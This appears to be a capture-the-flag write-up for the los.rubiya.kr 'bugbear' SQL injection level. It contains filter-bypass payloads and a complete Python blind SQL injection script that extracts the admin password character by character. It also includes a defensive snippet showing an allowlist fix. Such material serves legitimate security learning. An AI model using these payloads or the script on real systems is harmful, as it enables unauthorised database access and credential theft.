[LOS] Level 13 bugbear Writeup

2019. 8. 7. 00:22 | Writeups / los.rubiya.kr

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>

The banned tokens are prob, _, ., (), ', substr, ascii, =, or, and, (space), like and 0x.

Everything else is the same as the previous problem (darkknight).

In the previous problem the payload took the following form:

no=0 or id like 0x61646d696e and mid(pw,1,1)>0x64

Replace or and and with || and %26%26 (&&), replace like with in, and either replace spaces with %09 (tab) or wrap terms in parentheses so that no spaces are needed.

Instead of 0x64 you can use char(100) (hex -> dec).

Also, when comparing characters you can use hex() instead of 0x.

That's about it for hints..?
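As an added example (not from the post or the challenge), the two `no` filters from the PHP above transcribed into Python and run against the post's own payloads: the darkknight-style form is caught by the blocklist, the bugbear forms pass it, and a strict integer allowlist on `no` (the fix, since `no` is compared as a number) rejects all of them. The sample values are constructed from the post's queries; `i=1` and the thresholds 5 and 100 are arbitrary.

```python
import re
from urllib.parse import unquote

# The two blocklist checks the challenge applies to the `no` parameter,
# transcribed from the PHP into Python regexes (same patterns, /i flag).
NO_FILTERS = [
    re.compile(r"prob|_|\.|\(\)", re.I),
    re.compile(r"'|substr|ascii|=|or|and| |like|0x", re.I),
]


def blocklist_blocks(no: str) -> bool:
    """True if the challenge's blocklist would reject this `no` value."""
    return any(f.search(no) for f in NO_FILTERS)


def allowlist_ok(no: str) -> bool:
    """The fix: `no` is used as a number, so accept only an integer literal."""
    return re.fullmatch(r"[0-9]+", no) is not None


# Constructed query-string values: the darkknight-style form the post says is
# now filtered, the three bugbear probes from the script (i=1, thresholds 5
# and 100), and a legitimate value. unquote() mirrors how PHP decodes $_GET.
SAMPLES = {
    "darkknight_style": "0 or id like 0x61646d696e and mid(pw,1,1)>0x64",
    "length_probe": unquote("0||(id)in(char(97,100,109,105,110))%26%26length(pw)<1"),
    "digit_probe": unquote("0||(id)in(char(97,100,109,105,110))%26%26mid(pw,1,1)>5"),
    "hex_probe": unquote("0||(id)in(char(97,100,109,105,110))%26%26hex(mid(pw,1,1))>hex(100)"),
    "legit": "1",
}


def evaluate(samples=SAMPLES):
    """Return {name: (blocked_by_blocklist, accepted_by_allowlist)} per sample."""
    return {name: (blocklist_blocks(v), allowlist_ok(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (blocked, accepted) in evaluate().items():
        print(f"{name:17} blocklist blocks: {blocked!s:5} allowlist accepts: {accepted}")
```

The blocklist catches only the spelling it was written for; the allowlist never needs to know which spelling the next payload uses.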


Now run the code again.

The answer is 52dc3991~

 

import urllib.request

url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
headers = {}
headers['cookie'] = " "  # session cookie required by login_chk(); left blank in the post
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"

# Common prefix of every probe: 0 || (id) in (char(97,100,109,105,110)) && ...
# char(97,100,109,105,110) spells 'admin' without quotes or 0x, || and %26%26 (&&)
# stand in for or/and, in replaces like, and parentheses avoid any spaces.
PREFIX = "?no=0||(id)in(char(97,100,109,105,110))%26%26"


def hello_admin(query):
    """Send one probe and return True if the response contains 'Hello admin'."""
    req = urllib.request.Request(url + query, headers=headers)
    data = urllib.request.urlopen(req).read().decode('utf-8')
    return data.find("Hello admin") != -1


# length
def find_leth():
    """Password length: the smallest n for which length(pw) < n holds, minus one."""
    leth = 1
    while True:
        if not hello_admin(PREFIX + "length(pw)<" + str(leth)):
            leth += 1
        else:
            print(f'leth={leth-1}')
            return leth - 1


def bin_search_num(i):
    """Binary-search the i-th character as a digit using mid(pw,i,1)>n.
    Returns None for '0' and for non-digits (both compare as 0 in MySQL)."""
    front = 0
    end = 9
    while front <= end:
        mid = (front + end) // 2
        gt_mid = hello_admin(PREFIX + "mid(pw," + str(i) + ",1)>" + str(mid))
        gt_mid1 = hello_admin(PREFIX + "mid(pw," + str(i) + ",1)>" + str(mid + 1))
        if gt_mid and not gt_mid1:
            print(f'{i}th key: {mid+1}')
            return str(mid + 1)
        elif gt_mid and gt_mid1:
            front = mid + 1
        elif not gt_mid and not gt_mid1:
            end = mid - 1
    return None


def bin_search_ascii(i):
    """Binary-search the i-th character over ASCII 58..126 by comparing hex() strings
    (equal-length hex strings order like their numbers) instead of the banned ascii()."""
    front = 58
    end = 126
    while front <= end:
        mid = (front + end) // 2
        gt_mid = hello_admin(PREFIX + "hex(mid(pw," + str(i) + ",1))>hex(" + str(mid) + ")")
        gt_mid1 = hello_admin(PREFIX + "hex(mid(pw," + str(i) + ",1))>hex(" + str(mid + 1) + ")")
        if gt_mid and not gt_mid1:
            print(f'{i}th key: {chr(mid+1)}')
            return chr(mid + 1)
        elif gt_mid and gt_mid1:
            front = mid + 1
        elif not gt_mid and not gt_mid1:
            end = mid - 1
    return None


if __name__ == '__main__':
    leth = find_leth()
    ans = []
    for i in range(1, leth + 1):
        ans.append(bin_search_num(i))       # try a digit 1-9 first
        if ans[i-1] is None:
            ans[i-1] = bin_search_ascii(i)  # then letters and other printable characters
        if ans[i-1] is None:                # neither matched: assume the character is '0'
            print(f'{i}th key: 0')
            ans[i-1] = '0'
    print('password is ' + ''.join(ans))
